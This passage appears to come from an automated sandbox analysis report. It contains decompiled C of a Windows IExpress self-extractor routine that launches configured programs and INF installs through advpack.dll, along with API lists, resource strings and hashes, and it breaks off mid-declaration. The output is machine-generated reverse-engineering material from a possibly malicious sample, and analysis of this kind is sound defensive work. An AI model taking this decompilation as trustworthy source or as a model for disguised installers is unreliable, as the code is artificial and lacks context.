c6fcf 3229->3230 3231 c69b8 __p__fmode __p__commode 3232 c69f9 3231->3232 3233 c6a0e 3232->3233 3234 c6a02 __setusermatherr 3232->3234 3237 c71ef _controlfp 3233->3237 3234->3233 3236 c6a13 3237->3236 3238 c7270 _except_handler4_common 3239 c34f0 3240 c3504 3239->3240 3241 c35b8 3239->3241 3240->3241 3242 c35be GetDesktopWindow 3240->3242 3243 c351b 3240->3243 3244 c3526 3241->3244 3247 c3671 EndDialog 3241->3247 3248 c43d0 11 API calls 3242->3248 3245 c354f 3243->3245 3246 c351f 3243->3246 3245->3244 3251 c3559 ResetEvent 3245->3251 3246->3244 3250 c352d TerminateThread EndDialog 3246->3250 3247->3244 3249 c35d6 3248->3249 3252 c361d SetWindowTextA CreateThread 3249->3252 3253 c35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3249->3253 3250->3244 3254 c44b9 20 API calls 3251->3254 3252->3244 3255 c3646 3252->3255 3253->3252 3258 c3581 3254->3258 3256 c44b9 20 API calls 3255->3256 3256->3241 3257 c359b SetEvent 3260 c3680 4 API calls 3257->3260 3258->3257 3259 c358a SetEvent 3258->3259 3259->3244 3260->3241 3261 c6ef0 3262 c6f2d 3261->3262 3264 c6f02 3261->3264 3263 c6f27 ?terminate@ 3263->3262 3264->3262 3264->3263

                                                                                                                                                                                                        Callgraph


                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E000C3BA2() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v280;
                                                                                                                                                                                                        				short _v300;
                                                                                                                                                                                                        				intOrPtr _v304;
                                                                                                                                                                                                        				void _v348;
                                                                                                                                                                                                        				char _v352;
                                                                                                                                                                                                        				intOrPtr _v356;
                                                                                                                                                                                                        				signed int _v360;
                                                                                                                                                                                                        				short _v364;
                                                                                                                                                                                                        				char* _v368;
                                                                                                                                                                                                        				intOrPtr _v372;
                                                                                                                                                                                                        				void* _v376;
                                                                                                                                                                                                        				intOrPtr _v380;
                                                                                                                                                                                                        				char _v384;
                                                                                                                                                                                                        				signed int _v388;
                                                                                                                                                                                                        				intOrPtr _v392;
                                                                                                                                                                                                        				signed int _v396;
                                                                                                                                                                                                        				signed int _v400;
                                                                                                                                                                                                        				signed int _v404;
                                                                                                                                                                                                        				void* _v408;
                                                                                                                                                                                                        				void* _v424;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                                        				signed int _t79;
                                                                                                                                                                                                        				short _t96;
                                                                                                                                                                                                        				signed int _t97;
                                                                                                                                                                                                        				intOrPtr _t98;
                                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                                        				signed int _t104;
                                                                                                                                                                                                        				signed int _t108;
                                                                                                                                                                                                        				int _t112;
                                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                                        				signed char _t118;
                                                                                                                                                                                                        				void* _t125;
                                                                                                                                                                                                        				signed int _t127;
                                                                                                                                                                                                        				void* _t128;
                                                                                                                                                                                                        				struct HINSTANCE__* _t129;
                                                                                                                                                                                                        				void* _t130;
                                                                                                                                                                                                        				short _t137;
                                                                                                                                                                                                        				char* _t140;
                                                                                                                                                                                                        				signed char _t144;
                                                                                                                                                                                                        				signed char _t145;
                                                                                                                                                                                                        				signed int _t149;
                                                                                                                                                                                                        				void* _t150;
                                                                                                                                                                                                        				void* _t151;
                                                                                                                                                                                                        				signed int _t153;
                                                                                                                                                                                                        				void* _t155;
                                                                                                                                                                                                        				void* _t156;
                                                                                                                                                                                                        				signed int _t157;
                                                                                                                                                                                                        				signed int _t162;
                                                                                                                                                                                                        				signed int _t164;
                                                                                                                                                                                                        				void* _t165;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                        				_t69 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                        				_t153 = 0;
                                                                                                                                                                                                        				 *0xc9124 =  *0xc9124 & 0;
                                                                                                                                                                                                        				_t149 = 0;
                                                                                                                                                                                                        				_v388 = 0;
                                                                                                                                                                                                        				_v384 = 0;
                                                                                                                                                                                                        				_t165 =  *0xc8a28 - _t153; // 0x0
                                                                                                                                                                                                        				if(_t165 != 0) {
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t127 = 0;
                                                                                                                                                                                                        					_v392 = 0;
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                        						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                        						_t164 = _t164 + 0xc;
                                                                                                                                                                                                        						_v348 = 0x44;
                                                                                                                                                                                                        						if( *0xc8c42 != 0) {
                                                                                                                                                                                                        							goto L26;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t146 =  &_v396;
                                                                                                                                                                                                        						_t115 = E000C468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                        						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                        							L25:
                                                                                                                                                                                                        							_t146 = 0x4b1;
                                                                                                                                                                                                        							E000C44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        							 *0xc9124 = 0x80070714;
                                                                                                                                                                                                        							goto L62;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							if(_v396 != 1) {
                                                                                                                                                                                                        								__eflags = _v396 - 2;
                                                                                                                                                                                                        								if(_v396 != 2) {
                                                                                                                                                                                                        									_t137 = 3;
                                                                                                                                                                                                        									__eflags = _v396 - _t137;
                                                                                                                                                                                                        									if(_v396 == _t137) {
                                                                                                                                                                                                        										_v304 = 1;
                                                                                                                                                                                                        										_v300 = _t137;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L14;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_push(6);
                                                                                                                                                                                                        								_v304 = 1;
                                                                                                                                                                                                        								_pop(0);
                                                                                                                                                                                                        								goto L11;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_v304 = 1;
                                                                                                                                                                                                        								L11:
                                                                                                                                                                                                        								_v300 = 0;
                                                                                                                                                                                                        								L14:
                                                                                                                                                                                                        								if(_t127 != 0) {
                                                                                                                                                                                                        									L27:
                                                                                                                                                                                                        									_t155 = 1;
                                                                                                                                                                                                        									__eflags = _t127 - 1;
                                                                                                                                                                                                        									if(_t127 != 1) {
                                                                                                                                                                                                        										L31:
                                                                                                                                                                                                        										_t132 =  &_v280;
                                                                                                                                                                                                        										_t76 = E000C1AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                        										__eflags = _t76;
                                                                                                                                                                                                        										if(_t76 == 0) {
                                                                                                                                                                                                        											L62:
                                                                                                                                                                                                        											_t77 = 0;
                                                                                                                                                                                                        											L63:
                                                                                                                                                                                                        											_pop(_t150);
                                                                                                                                                                                                        											_pop(_t156);
                                                                                                                                                                                                        											_pop(_t128);
                                                                                                                                                                                                        											return E000C6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t157 = _v404;
                                                                                                                                                                                                        										__eflags = _t149;
                                                                                                                                                                                                        										if(_t149 != 0) {
                                                                                                                                                                                                        											L37:
                                                                                                                                                                                                        											__eflags = _t157;
                                                                                                                                                                                                        											if(_t157 == 0) {
                                                                                                                                                                                                        												L57:
                                                                                                                                                                                                        												_t151 = _v408;
                                                                                                                                                                                                        												_t146 =  &_v352;
                                                                                                                                                                                                        												_t130 = _t151; // executed
                                                                                                                                                                                                        												_t79 = E000C3FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                        												__eflags = _t79;
                                                                                                                                                                                                        												if(_t79 == 0) {
                                                                                                                                                                                                        													L61:
                                                                                                                                                                                                        													LocalFree(_t151);
                                                                                                                                                                                                        													goto L62;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												L58:
                                                                                                                                                                                                        												LocalFree(_t151);
                                                                                                                                                                                                        												_t127 = _t127 + 1;
                                                                                                                                                                                                        												_v396 = _t127;
                                                                                                                                                                                                        												__eflags = _t127 - 2;
                                                                                                                                                                                                        												if(_t127 >= 2) {
                                                                                                                                                                                                        													_t155 = 1;
                                                                                                                                                                                                        													__eflags = 1;
                                                                                                                                                                                                        													L69:
                                                                                                                                                                                                        													__eflags =  *0xc8580;
                                                                                                                                                                                                        													if( *0xc8580 != 0) {
                                                                                                                                                                                                        														E000C2267();
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													_t77 = _t155;
                                                                                                                                                                                                        													goto L63;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t153 = _v392;
                                                                                                                                                                                                        												_t149 = _v388;
                                                                                                                                                                                                        												continue;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											L38:
                                                                                                                                                                                                        											__eflags =  *0xc8180;
                                                                                                                                                                                                        											if( *0xc8180 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c7;
                                                                                                                                                                                                        												E000C44B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                        												LocalFree(_v424);
                                                                                                                                                                                                        												 *0xc9124 = 0x8007042b;
                                                                                                                                                                                                        												goto L62;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t157;
                                                                                                                                                                                                        											if(_t157 == 0) {
                                                                                                                                                                                                        												goto L57;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0xc9a34 & 0x00000004;
                                                                                                                                                                                                        											if(__eflags == 0) {
                                                                                                                                                                                                        												goto L57;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t129 = E000C6495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                        											__eflags = _t129;
                                                                                                                                                                                                        											if(_t129 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c8;
                                                                                                                                                                                                        												E000C44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                        												L65:
                                                                                                                                                                                                        												LocalFree(_v408);
                                                                                                                                                                                                        												 *0xc9124 = E000C6285();
                                                                                                                                                                                                        												goto L62;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                        											_v404 = _t146;
                                                                                                                                                                                                        											__eflags = _t146;
                                                                                                                                                                                                        											if(_t146 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c9;
                                                                                                                                                                                                        												__eflags = 0;
                                                                                                                                                                                                        												E000C44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                        												FreeLibrary(_t129);
                                                                                                                                                                                                        												goto L65;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0xc8a30;
                                                                                                                                                                                                        											_t151 = _v408;
                                                                                                                                                                                                        											_v384 = 0;
                                                                                                                                                                                                        											_v368 =  &_v280;
                                                                                                                                                                                                        											_t96 =  *0xc9a40; // 0x3
                                                                                                                                                                                                        											_v364 = _t96;
                                                                                                                                                                                                        											_t97 =  *0xc8a38 & 0x0000ffff;
                                                                                                                                                                                                        											_v380 = 0xc9154;
                                                                                                                                                                                                        											_v376 = _t151;
                                                                                                                                                                                                        											_v372 = 0xc91e4;
                                                                                                                                                                                                        											_v360 = _t97;
                                                                                                                                                                                                        											if( *0xc8a30 != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t144 =  *0xc9a34; // 0x1
                                                                                                                                                                                                        											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                        											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                        											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t145 =  *0xc8d48; // 0x0
                                                                                                                                                                                                        											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                        											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t145;
                                                                                                                                                                                                        											if(_t145 < 0) {
                                                                                                                                                                                                        												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                        												__eflags = _t104;
                                                                                                                                                                                                        												_v360 = _t104;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t98 =  *0xc9a38; // 0x0
                                                                                                                                                                                                        											_v356 = _t98;
                                                                                                                                                                                                        											_t130 = _t146;
                                                                                                                                                                                                        											 *0xca288( &_v384);
                                                                                                                                                                                                        											_t101 = _v404();
                                                                                                                                                                                                        											__eflags = _t164 - _t164;
                                                                                                                                                                                                        											if(_t164 != _t164) {
                                                                                                                                                                                                        												_t130 = 4;
                                                                                                                                                                                                        												asm("int 0x29");
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											 *0xc9124 = _t101;
                                                                                                                                                                                                        											_push(_t129);
                                                                                                                                                                                                        											__eflags = _t101;
                                                                                                                                                                                                        											if(_t101 < 0) {
                                                                                                                                                                                                        												FreeLibrary();
                                                                                                                                                                                                        												goto L61;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												FreeLibrary();
                                                                                                                                                                                                        												_t127 = _v400;
                                                                                                                                                                                                        												goto L58;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags =  *0xc9a40 - 1; // 0x3
                                                                                                                                                                                                        										if(__eflags == 0) {
                                                                                                                                                                                                        											goto L37;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags =  *0xc8a20;
                                                                                                                                                                                                        										if( *0xc8a20 == 0) {
                                                                                                                                                                                                        											goto L37;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t157;
                                                                                                                                                                                                        										if(_t157 != 0) {
                                                                                                                                                                                                        											goto L38;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_v388 = 1;
                                                                                                                                                                                                        										E000C202A(_t146); // executed
                                                                                                                                                                                                        										goto L37;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t146 =  &_v280;
                                                                                                                                                                                                        									_t108 = E000C468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                        									__eflags = _t108;
                                                                                                                                                                                                        									if(_t108 == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags =  *0xc8c42;
                                                                                                                                                                                                        									if( *0xc8c42 != 0) {
                                                                                                                                                                                                        										goto L69;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                        									__eflags = _t112 == 0;
                                                                                                                                                                                                        									if(_t112 == 0) {
                                                                                                                                                                                                        										goto L69;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L31;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t118 =  *0xc8a38; // 0x0
                                                                                                                                                                                                        								if(_t118 == 0) {
                                                                                                                                                                                                        									L23:
                                                                                                                                                                                                        									if(_t153 != 0) {
                                                                                                                                                                                                        										goto L31;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t146 =  &_v276;
                                                                                                                                                                                                        									if(E000C468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                        										goto L27;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L25;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                        									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                        									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                        										goto L62;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t140 = "USRQCMD";
                                                                                                                                                                                                        									L20:
                                                                                                                                                                                                        									_t146 =  &_v276;
                                                                                                                                                                                                        									if(E000C468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                        										_t153 = 1;
                                                                                                                                                                                                        										_v388 = 1;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t140 = "ADMQCMD";
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L26:
                                                                                                                                                                                                        						_push(_t130);
                                                                                                                                                                                                        						_t146 = 0x104;
                                                                                                                                                                                                        						E000C1781( &_v276, 0x104, _t130, 0xc8c42);
                                                                                                                                                                                                        						goto L27;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t130 = "REBOOT";
                                                                                                                                                                                                        				_t125 = E000C468F(_t130, 0xc9a2c, 4);
                                                                                                                                                                                                        				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                        					goto L25;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}
                                                                                                                                                                                                        0x000c3fda
                                                                                                                                                                                                        0x000c3fda
                                                                                                                                                                                                        0x000c3fe1
                                                                                                                                                                                                        0x000c3fe3
                                                                                                                                                                                                        0x000c3fe3
                                                                                                                                                                                                        0x000c3fe8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3fe8
                                                                                                                                                                                                        0x000c3f33
                                                                                                                                                                                                        0x000c3f37
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3f37
                                                                                                                                                                                                        0x000c3dee
                                                                                                                                                                                                        0x000c3dee
                                                                                                                                                                                                        0x000c3df5
                                                                                                                                                                                                        0x000c3fad
                                                                                                                                                                                                        0x000c3fb9
                                                                                                                                                                                                        0x000c3fc2
                                                                                                                                                                                                        0x000c3fc8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3fc8
                                                                                                                                                                                                        0x000c3dfb
                                                                                                                                                                                                        0x000c3dfd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3e03
                                                                                                                                                                                                        0x000c3e0a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3e15
                                                                                                                                                                                                        0x000c3e17
                                                                                                                                                                                                        0x000c3e19
                                                                                                                                                                                                        0x000c3f94
                                                                                                                                                                                                        0x000c3fa4
                                                                                                                                                                                                        0x000c3f7c
                                                                                                                                                                                                        0x000c3f80
                                                                                                                                                                                                        0x000c3f8b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3f8b
                                                                                                                                                                                                        0x000c3e2c
                                                                                                                                                                                                        0x000c3e30
                                                                                                                                                                                                        0x000c3e34
                                                                                                                                                                                                        0x000c3e36
                                                                                                                                                                                                        0x000c3f69
                                                                                                                                                                                                        0x000c3f6e
                                                                                                                                                                                                        0x000c3f70
                                                                                                                                                                                                        0x000c3f76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3f76
                                                                                                                                                                                                        0x000c3e3c
                                                                                                                                                                                                        0x000c3e43
                                                                                                                                                                                                        0x000c3e47
                                                                                                                                                                                                        0x000c3e52
                                                                                                                                                                                                        0x000c3e56
                                                                                                                                                                                                        0x000c3e5c
                                                                                                                                                                                                        0x000c3e61
                                                                                                                                                                                                        0x000c3e68
                                                                                                                                                                                                        0x000c3e70
                                                                                                                                                                                                        0x000c3e74
                                                                                                                                                                                                        0x000c3e7c
                                                                                                                                                                                                        0x000c3e80
                                                                                                                                                                                                        0x000c3e82
                                                                                                                                                                                                        0x000c3e82
                                                                                                                                                                                                        0x000c3e87
                                                                                                                                                                                                        0x000c3e87
                                                                                                                                                                                                        0x000c3e8b
                                                                                                                                                                                                        0x000c3e91
                                                                                                                                                                                                        0x000c3e94
                                                                                                                                                                                                        0x000c3e96
                                                                                                                                                                                                        0x000c3e96
                                                                                                                                                                                                        0x000c3e9b
                                                                                                                                                                                                        0x000c3e9b
                                                                                                                                                                                                        0x000c3e9f
                                                                                                                                                                                                        0x000c3ea2
                                                                                                                                                                                                        0x000c3ea4
                                                                                                                                                                                                        0x000c3ea4
                                                                                                                                                                                                        0x000c3ea9
                                                                                                                                                                                                        0x000c3ea9
                                                                                                                                                                                                        0x000c3ead
                                                                                                                                                                                                        0x000c3eb3
                                                                                                                                                                                                        0x000c3eb6
                                                                                                                                                                                                        0x000c3eb8
                                                                                                                                                                                                        0x000c3eb8
                                                                                                                                                                                                        0x000c3ebd
                                                                                                                                                                                                        0x000c3ebd
                                                                                                                                                                                                        0x000c3ec1
                                                                                                                                                                                                        0x000c3ec3
                                                                                                                                                                                                        0x000c3ec5
                                                                                                                                                                                                        0x000c3ec5
                                                                                                                                                                                                        0x000c3eca
                                                                                                                                                                                                        0x000c3eca
                                                                                                                                                                                                        0x000c3ece
                                                                                                                                                                                                        0x000c3ed5
                                                                                                                                                                                                        0x000c3ed9
                                                                                                                                                                                                        0x000c3ee0
                                                                                                                                                                                                        0x000c3ee6
                                                                                                                                                                                                        0x000c3eea
                                                                                                                                                                                                        0x000c3eec
                                                                                                                                                                                                        0x000c3eee
                                                                                                                                                                                                        0x000c3ef3
                                                                                                                                                                                                        0x000c3ef3
                                                                                                                                                                                                        0x000c3ef5
                                                                                                                                                                                                        0x000c3efa
                                                                                                                                                                                                        0x000c3efb
                                                                                                                                                                                                        0x000c3efd
                                                                                                                                                                                                        0x000c3f40
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3eff
                                                                                                                                                                                                        0x000c3eff
                                                                                                                                                                                                        0x000c3f05
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3f05
                                                                                                                                                                                                        0x000c3efd
                                                                                                                                                                                                        0x000c3dc7
                                                                                                                                                                                                        0x000c3dce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3dd0
                                                                                                                                                                                                        0x000c3dd7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3dd9
                                                                                                                                                                                                        0x000c3ddb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3ddd
                                                                                                                                                                                                        0x000c3de1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3de1
                                                                                                                                                                                                        0x000c3d59
                                                                                                                                                                                                        0x000c3d65
                                                                                                                                                                                                        0x000c3d6a

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 000C3C11
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 000C3CDC
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46A0
                                                                                                                                                                                                          • Part of subcall function 000C468F: SizeofResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46A9
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46C3
                                                                                                                                                                                                          • Part of subcall function 000C468F: LoadResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46CC
                                                                                                                                                                                                          • Part of subcall function 000C468F: LockResource.KERNEL32(00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46D3
                                                                                                                                                                                                          • Part of subcall function 000C468F: memcpy_s.MSVCRT ref: 000C46E5
                                                                                                                                                                                                          • Part of subcall function 000C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46EF
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,000C8C42), ref: 000C3D8F
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 000C3E26
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,000C8C42), ref: 000C3EFF
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,000C8C42), ref: 000C3F1F
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,000C8C42), ref: 000C3F40
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,000C8C42), ref: 000C3F47
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,000C8C42), ref: 000C3F76
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,000C8C42), ref: 000C3F80
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,000C8C42), ref: 000C3FC2
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                        • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$cent
                                                                                                                                                                                                        • API String ID: 1032054927-1838232924
                                                                                                                                                                                                        • Opcode ID: 8d6d557d4820e3f199e7351f82620f7ca880eb4c9c5cc503f5d878c1ed510d27
                                                                                                                                                                                                        • Instruction ID: a8c9ee3c02ac60a82eccd86520650c6b9718852fac2e87b75d2efcd454600a20
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d6d557d4820e3f199e7351f82620f7ca880eb4c9c5cc503f5d878c1ed510d27
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4B100706283019BE360DF24D849FAF76E4EB85740F10892DFA86D61E1DB78CA01CB96
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E000C1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v527;
                                                                                                                                                                                                        				char _v528;
                                                                                                                                                                                                        				char _v1552;
                                                                                                                                                                                                        				CHAR* _v1556;
                                                                                                                                                                                                        				int* _v1560;
                                                                                                                                                                                                        				CHAR** _v1564;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t48;
                                                                                                                                                                                                        				CHAR* _t53;
                                                                                                                                                                                                        				CHAR* _t54;
                                                                                                                                                                                                        				char* _t57;
                                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                                        				CHAR* _t60;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				signed char _t65;
                                                                                                                                                                                                        				intOrPtr _t76;
                                                                                                                                                                                                        				intOrPtr _t77;
                                                                                                                                                                                                        				unsigned int _t85;
                                                                                                                                                                                                        				CHAR* _t90;
                                                                                                                                                                                                        				CHAR* _t92;
	char _t105;
	char _t106;
	CHAR** _t111;
	CHAR* _t115;
	intOrPtr* _t125;
	void* _t126;
	CHAR* _t132;
	CHAR* _t135;
	void* _t138;
	void* _t139;
	void* _t145;
	intOrPtr* _t146;
	char* _t148;
	CHAR* _t151;
	void* _t152;
